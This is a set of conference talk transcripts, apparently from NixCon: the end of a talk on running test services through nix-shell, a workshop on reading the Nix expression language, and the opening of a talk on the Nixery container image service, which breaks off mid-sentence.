And when they're done they just call stop-services, and everyone's gonna thank you for this — because most companies still do: oh, you want to run the tests? You need Postgres, just do sudo apt install postgres. With this, no need for that; people don't even need to know that Postgres exists. You might want to add a few more things, like wrappers that set environment variables. Here we actually need our tests to use some built JavaScript, so we set an environment variable pointing at JavaScript that was built by Nix. Even if you forget how you actually did the packaging, you don't have to worry about it. I'm using this once a month — we started working in April, I think; one day I packaged it, and now I don't have to worry about it anymore. I actually forgot how it works, and that's it. Thank you for listening. Do you have any questions or experience reports that you want to share? So, are you aware of the NixOS testing suite, where it spawns a QEMU machine and you can use the Nix description language to start the services inside — and if yes, why didn't you use it? So first of all, I'm not using NixOS in production, right? So a NixOS test would mean I'd have to create a new NixOS module with my code and then ship that into a full Nix build. The other problem is that NixOS tests only run on Linux, as far as I know — I'm using Linux, but the friend I'm working with on this uses Darwin, so it wasn't really an option. And also it doesn't allow you to do local development, right? If I use GHCi to test my code — I also have unit tests, unit tests that run against Postgres — in that case that would mean: okay, I'm in GHCi, I make a change, then I close GHCi, I do nix-build, then it has to rebuild everything from scratch, the whole Haskell library, and then start the tests. It would take probably a minute for everything to happen.
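The shell wrapper described above — a shellHook defining start/stop functions so coworkers never install Postgres themselves — might look like this sketch; the service details are illustrative:

```nix
# nix-shell wrapper: `start-services` / `stop-services` become shell
# functions, so local development gets the same services as the tests.
pkgs.mkShell {
  buildInputs = [ pkgs.postgresql pkgs.minio ];

  shellHook = ''
    start-services() {
      export PGDATA="$PWD/.pg_data"
      [ -d "$PGDATA" ] || initdb
      pg_ctl start -w -o "-k $PWD -c listen_addresses="
      # ...start Minio, ElasticMQ, DynamoDB local the same way...
    }

    stop-services() {
      pg_ctl stop -m immediate
      # ...stop the other services...
    }
  '';
}
```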
Whereas if I just start Postgres in the background or anything like that, I just do :reload in GHCi, main runs the tests, and I'm good. The iteration cycle is about five seconds. Yeah. Did you look at Terratest? At? Terratest. Terratest, no — what is it? It's a framework wrapped around Terraform to do integration testing, so it spins up components, runs a test cycle, and destroys those components. It's a little bit like Inspec and Serverspec, but with support for Terraform. Very nice. So this is also something that takes some time to run, right? But I didn't know about this, and this is great. It has some overlap. Thank you very much. I also wanted to make another tooling suggestion, which is Terranix — I don't know if the Terranix author is here today — it's a really cool way to write Terraform with Nix syntax instead, and it does away with all the horrors you have to go through when you realize that the Terraform language itself can't do all kinds of stuff. You can write it in Nix instead, and I find it very convenient, so that might also be something that's useful. Yeah — although if the goal is to hide Nix from your coworkers, then, I don't hate you, but this is a bad move. I have a question. Do developers use these services started from nix-shell for local development, or only for test running? You mean these? Yes. Yeah, so in this project I'm the only Haskell developer, so I'm the only one using the REPL things, for instance. But whenever I work at a company — basically whenever I work — I write these, and people like using them because it makes their life much, much simpler. Okay, I have a question then: what do you do with the frontend? Is it started like this, or do the developers not run the frontend locally? I don't do frontend — I let them deal with their mess. So, I don't know, they use everything except the frontend, right? Yeah, exactly — they use webpack and whatever, so I have no idea how it works, so I'm not even attempting to help at all.
Sorry — oh no, that's not true. No, no, I've done it before for a different company, but it was very tricky to get right, because most of the time their editors are very tightly integrated with the build system, and so it just breaks everything for their editors — which is a common theme in many languages, actually. All right, thank you very much for listening. If you have more questions, come find me. Great. Bye.
This is an overview of the setup we used when building DeckDeckGo. We used Nix to test and deploy code to AWS Lambda, backed by Amazon's Simple Queue Service, DynamoDB, S3 and RDS PostgreSQL.
10.5446/50695 (DOI)
I didn't really advertise this track heavily, so I'm surprised that there are so many people — and I'm also delighted. Maybe we should start with just a quick... So this is more of an interactive session. The goal is for you to learn how to use Nix, and kind of go over all of the aspects, because it can be a bit difficult, right? So maybe we can start with a quick round of... maybe, who knows how to read Nix code? Maybe raise your hand. Okay, so half of the room. Who knows how to create a new package in nixpkgs? Yeah, let's test. So, yeah, today we're going to cover these things. The first talk is how to read Nix code, so it doesn't look so weird anymore. And then we're going to cover how Nix works internally, and how to build your own packages. And if there's something that's unclear, you should interrupt us, and then we can just go over it, right? Okay, let's get started. So: reading the Nix expression language. Nix is an ecosystem, and this is just a small part of it, which is the language Nix — and then we're going to see other parts of the ecosystem. So a long time ago — like three years ago, which is 30 years in a completely different time — I was starting with Nix and I was seeing things like this, right? Or like this, and like this. And what I did is I banged my head against it and I tried until it worked. The goal of this talk is that you don't have to do this, and maybe after the end of this talk you will be able to just read the code, and it makes sense. Okay, so what is the Nix language? The Nix language basically has JSON-like values — it actually translates quite well to JSON data types. So for example, a string is the same representation, a number is the same. A list is already a bit different, because we don't have commas between items. And to create an object you have key equals value, and then you need a semicolon to end the expression. Then there is null, and true and false.
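The value types just listed, put together in one expression — this is an illustrative sample, not the actual slide from the talk:

```nix
# JSON-like Nix values: strings, numbers, lists (no commas between
# items), attribute sets (key = value; ending in semicolons), null
# and booleans.
{
  greeting = "hello";
  answer = 42;
  names = [ "alice" "bob" "carol" ];  # no commas
  nothing = null;
  enabled = true;
  nested = { key = "value"; };
}
```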
So those are the JSON things, and if we put them together, it looks a bit like this. Okay, so strings have more constructs, a few different representations. You can also have multiline strings. One of the things you need to know about multiline strings is that Nix is going to remove the shared leading indentation of the string for you, so you can actually align your literal with your code: if you have indentation, Nix is going to do the right thing and remove everything that's in front. If you push one line even further in, it's not going to remove that extra part — it only removes the smallest common amount of whitespace. And then finally we have a URI-like representation, so you can just type your URIs bare. There has been talk of deprecating this one, so I'm just mentioning it here for completeness. Okay, so that's strings. There is another type that's called the path — that's not in the JSON data types — and it allows you to reference files directly. There are multiple notations. There's one where you just type a relative path, and that's going to be resolved to an absolute path relative to the file where it's being loaded, so it's easy to think about. Then you can use absolute paths, and it also works with tildes relative to your home directory. And then the last one, which you're probably only going to see with nixpkgs, is the angle-bracket notation. This is actually a lookup into the NIX_PATH environment variable. I'm just mentioning it for now; you just need to know that this is going to resolve to a path, and if you want to know what path it's going to be, you have to look at the NIX_PATH environment variable — it's key=value pairs. So you can see nixpkgs on the right here: I have my own nixpkgs checkout, so I just pointed it to my git repo. All right. So far we only have values; now we introduce functions. Nix functions are just lambdas. So here, for example, you have one function.
Each function has one argument, and it returns another function with one argument, and then that's the body of the function. So here we bind a value to a, we bind a value to b. And in terms of scoping, this creates a new scope. The scope only extends below the function — you can never leak variables upward, like you can in JavaScript where you declare a variable and it escapes its block, right? And then there's another representation, which is keyword arguments. Again, that's one function with one argument, but this one is going to be pattern-matched: you pass an attribute set — like an object — and it's going to extract the keys from the object and bind them into your scope. So those are two ways of writing it; the most popular one is this one, and we're going to see more examples after. So here, that's the simple way. But then if you pass, for example, an object that has a, b, and c, the evaluation is going to fail, because it's going to complain that c is not expected here. You can do more things with this: for example, you can specify default values; you can say "I don't care about any extra arguments" — that's going to act as a guard; and you can also bind the original attribute set that was passed to the function to a variable. Okay. So now we can build values and a bit of functions, and now we start looking into some of the builtin functions. These are functions provided by the interpreter; they kind of already exist in the environment. You have toString, for example. About toString: in Nix there's no automatic conversion — you have to specify if you want to convert from one type to another, except in one case, which I won't talk about. You can import a file: you can say "import another Nix file" and it's going to be evaluated, and then the value from this evaluation is returned to your current scope.
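The two function notations just described, in one sketch (the names are illustrative):

```nix
# Every Nix function takes exactly one argument; multi-argument
# functions are curried (a function returning a function).
let
  add = a: b: a + b;            # add 1 2 evaluates to 3

  # Keyword-argument style: the attribute set is pattern-matched.
  # `? "hello"` is a default, `...` tolerates extra keys (the guard),
  # and `@ args` binds the whole original attribute set.
  greet = { name, greeting ? "hello", ... } @ args:
    "${greeting}, ${name}!";
in
  greet { name = "NixCon"; extra = true; }   # => "hello, NixCon!"
```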
You can throw exceptions. There are functional-style things like map and fold and functions like that. So these are all top level. And then we have another attribute set, which is builtins, and in it you find more functions. So there's trace, which allows you to just print out things for debugging — that's kind of it. fromJSON, toJSON. And there are many more, but I'm not going to cover them right now. Okay. And keywords: there are a few keywords on top of that, and then we're going to finish with the operators. So the let binding allows you to bind values to names. Here we actually create a new scope where we bind hello and packages into the scope, and then they're available below, so you can access them. One thing to note here: you might notice that we access packages up here, because the names are all bound at the same time — so you don't care about the ordering of the let bindings, basically. And because Nix is a lazy language, if you never access one of these values, they're never evaluated. Rec is a bit of the same: if you have an attribute set and you add the rec keyword, it's going to do the same thing — it's going to bind all of these keys as variables. So sometimes you see a rec and you're wondering why it's there: it's just because it binds the values into the scope, and they're available below — like here, you can see the version. With is another keyword that imports all of the values of the attribute set that you pass into the scope. This one is a bit dangerous, like in most languages that have this kind of keyword: here we do "with packages" and then, magically — it's not very explicit — you have these variables that are just there. Excuse me, what is the difference between with and import? Okay, good question. Let me jump ahead a bit. Import allows you to do things like: here you get the value of the file, and then you can bind it to something in the environment.
Whereas the with keyword is: you say "with packages", and then the values of packages become variables in your scope — so you only take the attributes of packages and bind them. Only some of them? All of them. All of them. Import, unlike with, is a different construct: import is to load a new file into your scope, and with is a way to deconstruct an attribute set into your environment. Does that make sense? Yeah. Thanks. So here, packages, for example, has been imported somewhere before, and now we just create the scope, and then these are available — not magically, but they're kind of implicit. There's another keyword, which is inherit, and that is shorthand: basically, instead of writing gcc = packages.gcc; you can say inherit (packages) gcc. So it's just a way to reduce some repetition. And you can also use it when you inherit a value so you don't repeat it, like packages = packages. If you make a typo — well, the main advantage is that you avoid making typos. Then there is assert. This allows you to add another expression just before: you have your code without the assert, and you can insert the assert just here. That's for when you're debugging: you want to make some assumptions and verify them, so you add an assert — because the Nix error messages are not always super clear. So what you do is you sprinkle some asserts in your code, like "okay, I think this should be an attribute set", and then you get better feedback. All right. Yeah, we're almost there. Now we have operators. There's a way of constructing objects that is shorter than in JSON: you can create a deep hierarchy by just adding dots in between. So we can do fileSystems."/".device. For this value — actually, I should show you directly.
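Stepping back, the keywords covered in this section — let, rec, with, inherit, assert — in one illustrative sketch (packages here is a stand-in attribute set, not a real import):

```nix
# let bindings are mutually recursive and lazy; rec does the same inside
# an attribute set; with dumps an attribute set's keys into scope;
# inherit avoids `gcc = packages.gcc;` repetition; assert helps debugging.
let
  packages = { gcc = "gcc-drv"; curl = "curl-drv"; };
  version = "1.0";
  name = "demo-${version}";          # order of let bindings doesn't matter
  unused = throw "never evaluated";  # laziness: harmless unless accessed
in
assert builtins.isAttrs packages;    # verify an assumption while debugging
with packages;                       # gcc and curl are now in scope
rec {
  pname = "demo";
  fullName = "${pname}-${version}";  # rec: keys can refer to each other
  compiler = gcc;                    # implicitly from `with packages;`
  inherit (packages) curl;           # same as curl = packages.curl;
}
```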
So now I have a deep attribute set: fileSystems, then "/", then device in here. Okay. There's another keyword, or, which allows you to test if an attribute exists: it returns the attribute if it exists, and if it doesn't exist, it returns the alternative value. And finally there's the ? test operator, which just returns true or false depending on whether the key exists in the attribute set. Then there are a few built-in operators, like classic string interpolation. That's one case where conversion is done automatically when it comes to strings — in some cases, but not always. So here, for example, we access this value and we build the string from it. There's a merge operator, //, for attribute sets. It's shallow, so it doesn't do a deep merge — just good to know. Excuse me — when you read Nix code, in expressions for example, you see — and that's confusing — the dollar with the braces and then without the braces, right? So the one with braces is on the Nix language level — that is the interpolation. And the other one is used later on in the builder, in the build phase, which we're going to cover later — that is just a bash variable. So they look the same, but they're actually used at different moments, because you have the evaluation that happens and produces derivations, and then you build the derivations — so you have a full life cycle. We're going to cover it. And a number of other operators. So that's it for the language. So, do I have a volunteer to read? Based on everything I said, you should be able to. Good. All right, come over here. So the first line is the definition of a function, right? Yes. We have two arguments: stdenv and then fetchurl. Then we have the body of the function, which says that we want to — I don't understand this part. I know that this is the definition of some data, but I don't see a sign. So what does it mean? So this is an attribute set.
And we access this value. Yes. Which turns out to be a function. Oh, OK. And then we pass this — the whole attribute set, this whole record — we pass the record. OK. And in the record we have attributes and values. And one attribute is generated by a function that was passed in as an argument. And this function also takes something — an attribute set. What is the difference between the `rec` one and the plain attribute set? Great. So this attribute set is normal. This one has the `rec` keyword, which adds all of its keys to your scope. So this means that, for example, the scope of the function — which scope? — so it gets a new scope that inherits from the parent scope. So here we have a new scope which contains stdenv and fetchurl. Now when we enter here, we have a new scope that inherits from this one. So it's still accessible. First it adds all these values. And this one has no own scope, right? It doesn't. OK. We need pname over here, we need the version over here. So it has the scope of the parent. It's always recursive? Yeah, recursive — you can refer to the keys of the attribute set itself. Right, you can even refer to, say, `name`, from another key. That's what it is — it's recursive. Is `rec` a keyword? It's `rec`, for recursive. Yeah, I guess so. Yeah, sure. I still don't understand. So this one is using keys from the parent. Yeah. And this one is also using keys from the parent. So what is the difference? So when you write `rec`, you create a new scope. And here we have no new scope — the scope is always inherited, but with `rec` you can extend the scope with the new keys. I understand. So these ones are seeing those keys — they are using the scope of where they are initialized. Any question, maybe, to clarify?
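A minimal sketch of the difference being discussed (the names are illustrative):

```nix
{
  # plain attribute set: keys cannot see each other
  plain = { pname = "hello"; version = "1.0"; };

  # rec: keys are added to the scope, so they can reference each other
  withRec = rec {
    pname   = "hello";
    version = "1.0";
    name    = "${pname}-${version}";  # "hello-1.0"
  };
}
```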
If I were to use the URL key within that attribute set, I wouldn't be able to unless I wrote `rec` before the attribute set. Yes. So what you're asking is: if I need the URL in another key within that attribute set, then you would have to write the `rec`. Okay. So that's what `rec` does, basically. Yes. Okay. Now the set is recursive. Okay. Me too. Thank you. So, would this still work if we didn't use the `rec` keyword on the third line? No. If you remove this, then pname and version are not added to the scope, and then we wouldn't be able to use them down here. Okay. But you can also — so here we use it below, but you can also use it over here. Okay. So on the next line we assign an attribute, and then we have another attribute that is called meta, and it's generating another attribute set, but with the `with lib;` expression, right? It comes from lib. Yes. So inside here we can use attributes from lib. Yeah. Okay. So this one has access without having to use the namespace, right? Because with the namespace we would also access this, right — if I write something here like `lib.licenses` it will work, right? Yes. Okay. So with `with` we have the shorthand notation. Yes. And then this generates the whole thing. Yes. Thank you. Yeah. Thanks. So I have a question. So basically the body is what is returned by the function? Oh yeah — it's the result of the function. Okay. So this whole file is a function, right? Okay. And if you import this, you get a function. Okay. And if I call it with an attribute set with those two keys, it will return another attribute set? Oh no — it will return the result of invoking the mkDerivation function. Yes. Okay. Which takes another attribute set. Yeah. Okay. Cool. That's how we do things. Yes. Should we do another one? Yeah. Anyone else, for this one? It's shorter. Yeah. Okay. Nice.
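Putting the pieces together, the file being read aloud likely looks roughly like this — a reconstruction, with the package name, URL, and hash as placeholders:

```nix
{ stdenv, fetchurl }:

stdenv.mkDerivation rec {
  pname   = "hello";     # placeholder package
  version = "2.10";

  src = fetchurl {
    # pname/version are visible here thanks to `rec`
    url    = "https://example.org/${pname}-${version}.tar.gz";
    sha256 = "0000000000000000000000000000000000000000000000000000";
  };

  meta = with stdenv.lib; {
    description = "An example package";
    license     = licenses.gpl3;  # usable unqualified thanks to `with`
  };
}
```

Importing this file yields a function; calling it with `stdenv` and `fetchurl` returns the result of `mkDerivation`.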
A brave soul? Is it you? So this is a configuration.nix. This is NixOS stuff, not the Nix package manager. Yeah. Okay. I'm completely new to this — I'm just busking it. Okay, you just need to read the Nix. Okay. You import config and pkgs, and your hardware-configuration.nix is another bit of Nix code that you're importing into this file. So this is a function. Yeah. Yeah. Okay. So yeah, basically you're, again, creating a new function. Yeah. But this time we ignore extra parameters. Yeah — good question. So the idea of ignoring those parameters is to make sure that whatever we pass as an attribute set will work, as long as it has config and pkgs. All right. And we don't care about the other ones. Yeah. Okay. Sometimes you want to be strict and explicit about all the arguments; sometimes less so. So yeah, we have this attribute set, and then we assign the configuration to this key. So the contents of hardware-configuration.nix — all the definitions in there — become part of this. That's it. Yeah. So now you're going a bit too fast. Okay. Right now we're just reading the Nix. Okay. So we're thinking about what it's going to produce in terms of Nix values. Okay. Yeah, the end result is going to be that you include this one. Is it? Because isn't what's specified there just a path? Yeah — exactly. So right now, all we do is assign this array that contains a path. That's it. It's just a path for now. And we assign it to this attribute. Why not just use the import function on the file? Yes. Yes, you could. But that's not how NixOS is configured.
What NixOS does under the hood is it's going to import it for you. So we have config and pkgs as function arguments — where do we use those attributes, or variables, or whatever? I don't, actually — I could remove them, actually. And how do you — so here we have, like, services.sshd and imports. How do we know where they exist in this code? Yeah, for now, we don't know. All we do is build this big tree of config. So it's attribute sets inside attribute sets — that's it. We create the tree and we assign these values. That's it. And then in another talk, we're going to talk about how all of this gets put together. All the things. Yeah. Thank you. Maybe it'll show — because one thing I found very confusing is that I don't really understand how imports work in Nix, because obviously we use `import`, but it's not, like, a keyword. So how does it work? What if I override it? Well, yeah, but I don't think you can name something `import`, right? Or can you? Is `import` a keyword, or a function? So — you have a bunch of built-in functions, which are by default available in your scope. The keywords are more in the parsing section: when Nix parses the code, that's where it uses those. Yeah, so `import` is not a keyword — it's a function. It's a built-in function. Okay, so `import` is still a function, so I could define my own `import` in my scope, which would shadow the built-in `import`, and I would break everything underneath. Can you go back to this sample? Yeah. So the important thing to see here is that this is not `import` — `import` is a function, but this is `imports`. Yeah, yeah. Oh, sorry. Yeah — this `imports`: Nix doesn't know what `imports` means.
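A reconstruction of the kind of configuration.nix being discussed (the specific option and package are illustrative):

```nix
{ config, pkgs, ... }:  # extra arguments are ignored thanks to `...`

{
  # at evaluation time this is just a list containing a path;
  # the NixOS module system does the actual importing for us
  imports = [ ./hardware-configuration.nix ];

  # `imports` here is a plain attribute name, not the `import` builtin
  services.openssh.enable = true;

  environment.systemPackages = [ pkgs.htop ];
}
```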
And so we're not overloading anything in Nix — we're just making an attribute set with a list of paths. Yeah, but it reminds me of the keyword, right? So if we were to name it `import` and assign the array to `import`, would it still be the function in our scope? No — it would just be an array. Yeah, I guess you can shadow. You can shadow. Yeah, shadowing — you can do shadowing of existing variables with new variables, but only below. Yeah, in scope. But I don't want to confuse you with the recursion, because with `rec` sometimes you have, like, the same attribute and you're like, what? Why is it different? Like shadowing. Yeah, I agree. The `let` binding, the `rec`, and the `with` can all play similar roles. That's more of a thing for when you start writing Nix — you learn when it's appropriate to use which one. Yeah. I think the main problem is — I'm a procedural guy, a C guy — so I've got to get my head around the functional way of thinking. Yeah. And that's the main Everest-mountain thing. Once you get over the functional curve it's straightforward, but getting there takes a while. And it always makes more sense afterwards. Yeah — so you never mutate anything, right? When you do operations, you only return new values. All right, so to recap: Nix is a functional language; it's lazy and it's pure. I just want to go over that quickly. Functional is this approach where you don't mutate anything, like we were talking about, and you only have functions to do operations. Lazy means Nix only does an operation when you access something. So you can have a whole tree of operations somewhere — if you don't touch it, it's not going to be evaluated. So it's not like a scripting language, where in your head, when you read the Nix code, it's interactive — it does this thing, then this thing, then this thing.
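The shadowing just described can be sketched in a tiny expression:

```nix
let
  x = 1;
in
let
  x = 2;   # shadows the outer x for everything below this point
in x       # evaluates to 2
```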
It's only when you access the values that it's going to evaluate the whole thing. Which was a bit similar to my question earlier — maybe I can demonstrate more about this later. And then, finally, it's pure. In everything I showed, we are not writing anything to disk — we're only reading things. So there are no side effects. For now, all you can do, from what I explained, is maybe put a bunch of values together and then produce a JSON out of the Nix values. Isn't reading a file from the file system an impure operation? It is, but it's pure in the sense that you don't modify anything. As long as you only read, it's fine — you're like an observer. What happens if the file is not there? It throws an error. You get errors — they can just happen, like in a shell script. The nice thing is that if it fails, it fails consistently. So when do you compile the files? So that's what the next talk is about. Right now, all we're doing is taking a bunch of values and putting them together. So there's one big missing topic, and that's the derivation — because that's where all the computation and the builds happen. We're going to talk about this next. So we have a pure, functional scripting language. Hopefully, now, when you see Nix code, it's not just like, oh, what is this thing — you can actually follow through, and from that it makes you more independent. Thanks. I wonder if it might be interesting, on that configuration.nix, to sort of unpack it so it's building each attribute set individually — you're using a compact nested syntax; it might be interesting to show the more verbose version. Okay, I guess I can show that. So we have the configuration.nix here. What should we do? I'm just going to modify it for now and remove the function wrapper, because we established that we don't need any of the arguments anyway.
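Laziness and purity can be demonstrated with a tiny illustrative expression:

```nix
let
  boom = throw "never evaluated";  # an error, but bound lazily
  tree = { a = 1; b = boom; };
in tree.a                          # evaluates to 1; `boom` is never forced
```

Accessing `tree.b` instead would raise the error — evaluation only happens on access.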
And now there's a tool called nix-instantiate that allows you to actually evaluate the Nix code. You say `--eval`, and that returns the values. But right now you can see it's lazy, because it just returns the first level — it didn't try to evaluate all of the rest, because we didn't access it. So we can say: actually, please be strict. And now it returns the whole thing. It's not really readable, so I'm just going to generate JSON instead. A bit of... thank you. And now we have the whole structure. So that's what we have on the left. And here — oh. So the path is not a real value. There's no such file, right? Yeah. There's an error there. So we need the file. Oh, you're right. So if I touch this... There we go. So here we're starting to see a bit of Nix magic. Oh. What's that? So what it does is, when it accesses a file, it imports it into the Nix store, and that's the value of the attribute. And there's a hash here — we're going to cover that later. But if you change the configuration file, it changes the hash. And another thing to notice is that the keys are ordered. That's a property that we want to have, because basically we want to be reproducible — so we do things like ordering keys, so you always get the same result. It's something we can count on: the keys will be ordered on evaluation, always the same. Right. I think that's enough for now. We'll take a small break and then we can go ahead.
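The path-import behaviour just shown can be reproduced with a file like this (the file name follows the talk's example):

```nix
# demo.nix — referencing a file as a *path* value
{
  imports = [ ./hardware-configuration.nix ];
}
```

Evaluating it with `nix-instantiate --eval --strict --json demo.nix` serializes the path as a `/nix/store/<hash>-hardware-configuration.nix` string, and the hash changes whenever the referenced file's contents change.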
Nix is not a big language, but its syntax is quite foreign to the usual language suspects. The goal of this talk is to demystify the language. At the end, all viewers should be able to read Nix code and start wielding Nix's superpowers.
10.5446/50697 (DOI)
I actually didn't count. Hi. Right. I'm going to be doing a little bit of dual-microphoning. I've noticed throughout the course of the conference that very few people are doing demos, so I'm a little bit afraid that the demo gods might actually be striking down all of their vengeance upon me today, because I have four. So we'll see how that goes. Right. Hello, everyone. My name is Vincent. Test, one, two, three. Okay, it's a good start. Right, let's do it this way. My name is Vincent. I think I know about half of the people in this room. tazjin is my username — that's probably the name by which people know me better than my real name. It's the same username on GitHub, Twitter, IRC, whatever, so that's how you can reach out to me. Cool. So I'm here to talk to you about Nixery, my fresh and healthy way of building container images. And to kick that off, I want to give you a little bit of an overview of what the container ecosystem looks like at the moment, on a very high level. So, quick show of hands: who has never used Docker or anything like it? Okay, very few people. Cool. I'm not going to go into what containers are and so on, but I'll say a little bit about how the tooling works, because that's all the background you're going to need. So Docker has a concept of images, which are basically root file systems of a distribution, made up of a bunch of different tarballs called layers that are distributed over a registry protocol. The details of how this works under the hood don't really matter. The important thing is that there are different layers that get merged together. If you have a sequential list of tarballs that contain non-overlapping paths, they will be squashed into one file system. If you have overlapping paths, then the ones that appear later in the image manifest take precedence.
So this syntax over here is what's called a Dockerfile. This is the default method of building Docker images. You specify the base image at the top — in this case Ubuntu — and then you run individual commands. There are a bunch of additional instructions, such as ENV, which sets environment variables, and so on. What happens when you execute this is that Docker takes every single instruction in the Dockerfile, executes it, and turns the resulting file-system diff into a layer. What this means is that this is inherently extremely stateful, because no care is taken to make sure that things like timestamps on files are in any way normalized. So things that we deal with in Nix on a very fundamental level just don't exist conceptually in this world. I actually took this particular Dockerfile and ran it twice earlier today, and here are the hashes resulting from the two image builds. As you can see, they have nothing to do with each other at all. This was kind of my reaction. A while back I started thinking about whether there might be a better way to do this. Those of you who talked to me at NixCon 2018 probably heard my ideas about the Kubernetes controller for Nix — I will get to that in a second. But other people have been working on very similar things for a while. There was an initial attempt — actually not an attempt, a thing that works — to build Docker images via Nix, called buildImage; that's dockerTools.buildImage. What that does, the way I understand it, is it spins up a QEMU VM, installs the things that you want in it, and then takes a snapshot of that file system plus some extra information. That was the first idea for building Docker images in Nix, and it actually worked reasonably well. And then Graham C — is he here? Somewhere he is. Maybe not in this room right now.
Anyway, he wrote a thing called buildLayeredImage, which I will be referencing a couple of times throughout the talk, and which takes a more pure Nix approach to the construction of the layers. So instead of spinning up virtual machines and snapshotting their disks, it actually uses Nix to construct the tarballs themselves. Right. So about a year and a half ago I had this idea: what would the world look like if we didn't actually have to build these container images explicitly, and we just had some sort of content specification that tells us what we want in an image, with the image built based on that? So here's a mockup of something I prototyped in the beginning, where we added an extra resource to the Kubernetes API — that's something Kubernetes supports; you can see that up here. We had this simple YAML specification where each of the keys referred to a top-level entry in Nix packages. You submitted this into your cluster, a daemon ran in the back of the cluster, built an image out of it, pushed it into your registry, and did this whole normal stateful dance — but abstracted away from the user, by just creating an image with this name. After building this, an interesting thing happened. I tried to demo this to people, and it turns out that when you're demoing this, there are a lot of moving parts. You need to write a YAML file, submit it to a Kubernetes cluster, then a thing needs to run in the background, build the image and push it into a registry, and then Kubernetes launches pods that pull the image from there. So you've got six, seven things that can go wrong, and they all take a little bit of time. It's the kind of demo where you try to show it to someone, you make a few typos, and they're half falling asleep while you insist: trust me, this is a valuable concept I'm trying to get across.
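For reference, the buildLayeredImage approach mentioned here looks roughly like this in Nix — a sketch with an illustrative image name and contents:

```nix
{ pkgs ? import <nixpkgs> {} }:

# builds a layered Docker image purely in Nix — no Dockerfile,
# no Docker daemon, and a reproducible result
pkgs.dockerTools.buildLayeredImage {
  name     = "demo-image";   # illustrative name
  tag      = "latest";
  contents = [ pkgs.bashInteractive pkgs.htop ];
  config.Cmd = [ "${pkgs.bashInteractive}/bin/bash" ];
}
```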
So at some point I invented, on the fly, this idea of a demo mode for the controller. The idea here was that instead of having a specification ahead of time of what goes into the image, we just use the components of the image name to describe what should go into it. There are two main parts here. First the host name, which is just the address at which Docker should look up the image you're downloading. Then we've got a section that describes the packages. The first ones in here are so-called meta-packages, which are a kind of shorthand for sets of packages. `shell`, for example, gives you bashInteractive, iana-etc, and all these kinds of things that you probably want if you want a shell environment. And then you can specify, slash-separated, other packages that should go into the image. So I built this demo mode, and then I realized it was actually a much better idea than the first one I had. So I scrapped the actual controller, and was just like: this is the way forward. Right. Before we talk about this slide, I'm going to do my first little demo, just to show you what this thing actually looks like in practice. Okay. Microphone number two. So here's the public instance of Nixery. It's available at nixery.dev, and it's a public service that you can go and play with. So just to remember the... I can, I can. You don't actually need to read this — I'm just trying to show the logo as often as I can, because I spent countless hours designing it, as you can see. So let's do a little demo. Here's the standard Docker CLI. Is that readable enough? No? Okay, excellent. What this command says is: we're going to run a container, we're going to attach a TTY interactively, we're going to remove the container after we're done, and we will pull the image from nixery.dev — and we want an image containing `shell`.
So, as per the previous slide, this is going to give us an image that just contains a basic bash environment, in a second — I need to actually tell it what to run. So, here we go: here's bash. Coreutils and all sorts of things are installed, but no additional programs. If I try to run htop, which I didn't specify in the image, it's not going to be included. So what I can do is exit out of this and edit the command to include additional programs. Again, these are just referencing keys in Nix packages. An image is built on the fly and sent to me, and now I have a shell in which I can actually run htop. So that's the basic mode of operation. The public instance running at nixery.dev tracks whichever is the latest nixos channel, and I do updates for it roughly once or twice a week. But it turns out that what's actually a much more interesting use case than having these arbitrary ad-hoc images is the ability to add your own private services into it, and to see how this can be useful for CI and for organizations. So there's something I have to show. I personally keep a monorepo for my personal stuff, and here is the default.nix of my personal infrastructure repository. It contains things like my blog and so on, and it's mostly standard Nix stuff, so there's nothing super interesting to show here: I import Nix packages from a pinned commit, and then I have an overlay that overlays my own packages on top of it. If you want to know how this works in detail, and have discussions about pinning channels and so on, we can do that after the talk, because it's a slightly different topic. Anyway, in here I have a thing that I built, which is the NixCon demo, using naersk by nmattia — where is he? Also somewhere. An excellent tool which builds Rust based on lock-file specifications; huge fan of that. And I wrote a tiny — that's the wrong one — I wrote a tiny demo, which just looks like this.
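The overlay arrangement being described could look something like this — a hypothetical sketch, with made-up paths and names, not the speaker's actual file:

```nix
# default.nix of a hypothetical personal monorepo
let
  # nixpkgs pinned to a specific commit for reproducibility
  nixpkgs = builtins.fetchTarball {
    url = "https://github.com/NixOS/nixpkgs/archive/<commit>.tar.gz";
  };
in import nixpkgs {
  overlays = [
    (self: super: {
      # custom packages layered on top of nixpkgs, so Nixery can
      # serve them as image components like any other attribute
      nixcon-demo = super.callPackage ./nixcon-demo {};
    })
  ];
}
```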
This can either run as a web server, showing me this nice message — I hope, for the Czech people here, that I spelled that correctly, trusting the internet — or run with a CLI argument. It doesn't really matter what this program does; I just want to show you that there's an actual thing going on here. So I'm importing that into my Nix package set, and then I have it available in my overlay of packages. Down here I have a shell in which direnv — thanks to zimbatm — has just loaded some environment variables for me. One of them is the Nixery packages path. So I support multiple different sources for importing package sets into Nixery: one of them is git repositories, and one of them is local file paths. In this case I'm just using the file path of the checkout of my repository — I'm telling Nixery that the package set from which I want it to build images is the one I have at this place on my disk. So what I can do now is spin up a Nixery in here, which looks like that. And then over here on the other side, I can do the same thing I was doing before with my shell, but instead of pulling from nixery.dev, I'm pulling from localhost — this is the local instance I have running. So this one wasn't particularly interesting, because it was cached already, I think. But yeah, I just want to show that there is nothing in here right now — there's no program called nixcon-demo. Now I'm going to remove that image, just to prove to you that I'm not going to try to hit any caches here. I don't actually — ah, it would help if I could spell — I don't even have it. So then we can run this command again and add this one to the image. Here we go. "Could not find Nix package" — thanks. Here we go. Okay. So what was supposed to happen is that I pull an image down now and it contains the binary that I've added here. Quick show of hands: how much time should I spend working on getting that demo up and running, versus not?
Okay, I'll give it 20 seconds. So that looks correct to me. And then, here at the top somewhere — yep. Ah, okay, it's just called nixcon. Here we go. Right. And now I have my NixCon demo thing in here, built from the package set, overlaid into my local configuration. Cool. So that works. This actually turns into a kind of interesting way of deploying services, because in the configuration mode where I let you specify a git repository instead of a file path, I can translate tags into git commits — which we'll see in a bit — and then you start getting the ability to build CI pipelines out of this. Before I show that, I want to talk about something that I spent way too much time on, as a sort of premature optimization, but it was an interesting thing to go through. This is something that Graham kicked off when he started building buildLayeredImage. For historical reasons, Docker has a maximum number of layers that you can have in an image — it's around 125, for some reason. And it turns out that even using up all of those is not a very good idea, because you share this layer restriction with your users. So if you have users that want to pull an image and extend it by adding additional files, they can't if there are already 125 layers in the image. So Graham had this initial idea of creating a graph of all the dependencies that a given image needs, and then counting the popularity of individual things inside of that graph. So if you have more than one derivation that references something like glibc, then glibc becomes more popular; eventually you sort by this popularity, pick the most important ones from the top, and hope that those are going to match. But in this 